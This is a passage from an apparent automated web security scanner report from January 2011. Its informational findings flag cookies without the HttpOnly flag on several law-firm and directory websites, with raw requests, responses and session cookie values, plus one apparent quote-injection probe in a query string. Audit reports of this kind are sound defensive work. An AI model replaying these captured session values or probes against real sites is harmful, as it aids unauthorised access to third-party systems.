Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1078; path=/
Set-Cookie: PortletId=16201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 136440


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.121. http://www.hoganlovells.com/ourpeople/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ourpeople/ HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Referer: http://www.hoganlovells.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2116759900.1295449738.1295449738.1295449738.1; __utmc=1; __utmb=1.1.10.1295449738; is_returning=1; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; ZoneId=0; SiteId=1039

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:16:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 425166
Content-Length: 425166


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.122. http://www.hoganlovells.com/ourpeople/List.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ourpeople/List.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ourpeople/List.aspx HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:04:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1075; path=/
Set-Cookie: PortletId=13201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2633790


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.123. http://www.hoganlovells.com/practiceAreas/area.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /practiceAreas/area.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /practiceAreas/area.aspx?firmService=1720 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:42 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1076; path=/
Set-Cookie: PortletId=14201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 96298


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.124. http://www.hoganlovells.com/practiceareas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /practiceareas/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /practiceareas/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:10 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1076; path=/
Set-Cookie: PortletId=14201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109369


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><meta name="description" content="Hogan Lovells depth of experience, global reach, and compr
...[SNIP]...

10.125. http://www.hoganlovells.com/ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /ru/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ru/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:59:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=0fb58570-9f19-42a5-a60c-094e7983785b; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93185


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...

10.126. http://www.hoganlovells.com/splash/alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /splash/alumni/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /splash/alumni/ HTTP/1.1
Host: www.hoganlovells.com
Proxy-Connection: keep-alive
Referer: http://www.hoganlovells.com/ourpeople/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1075; PortletId=13201; SiteId=1039; SERVER_PORT=80; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=7; __utma=1.2116759900.1295449738.1295449738.1295449738.1; __utmc=1; __utmb=1.2.10.1295449738

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:19:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1219; path=/
Set-Cookie: PortletId=1293002; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 93405
Content-Length: 93405


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...

10.127. http://www.hoganlovells.com/zh-CHS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /zh-CHS/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /zh-CHS/ HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:58:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=e1e5d709-d272-479d-b837-048485c43deb; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1109; path=/
Set-Cookie: PortletId=1004701; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78931


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

   
...[SNIP]...

10.128. http://www.info.com/washington%20dc%20law%20firms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /washington%20dc%20law%20firms HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.221CKMYU; path=/
Date: Wed, 19 Jan 2011 16:44:23 GMT
Server: Apache
Set-Cookie: b=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1295455463+last_cmp++engineset; expires=Sun, 18-Jan-2037 23:52:19 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54488

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms - www.Info.com</title><link rel="shortcut icon" href="http://gfx.info.com/commo
...[SNIP]...

10.129. http://www.jonesdaydiversity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:42 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=saskam55h4ujmn45eaqckkzg; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9929
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...

10.130. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 138085
Date: Wed, 19 Jan 2011 16:52:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=pk4wl545lav5a245t34d1zys; path=/; HttpOnly
Set-Cookie: localcom=cid=2531/x22&loc=Dallas%2c+TX&kw=law+offices&uid=5331dc09-813f-4b95-9237-fac957ebffac&expdate=634336159381535318&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Fri, 18-Feb-2011 16:52:18 GMT; path=/
Set-Cookie: localcom_s=cid=2531/x22&exp=634310257381535318; domain=local.com; expires=Wed, 19-Jan-2011 17:22:18 GMT; path=/
Content-Length: 138085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX law offices | Find
...[SNIP]...

10.131. http://www.skadden.com/2011insights.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /2011insights.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011insights.cfm?contentID=52 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D52;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...

10.132. http://www.skadden.com/alumni/Index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /alumni/Index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /alumni/Index.cfm?contentID=7 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/
Set-Cookie: BACKLINK=%2CcontentID%3D7;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                           <!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w
...[SNIP]...

10.133. http://www.skadden.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /index.cfm

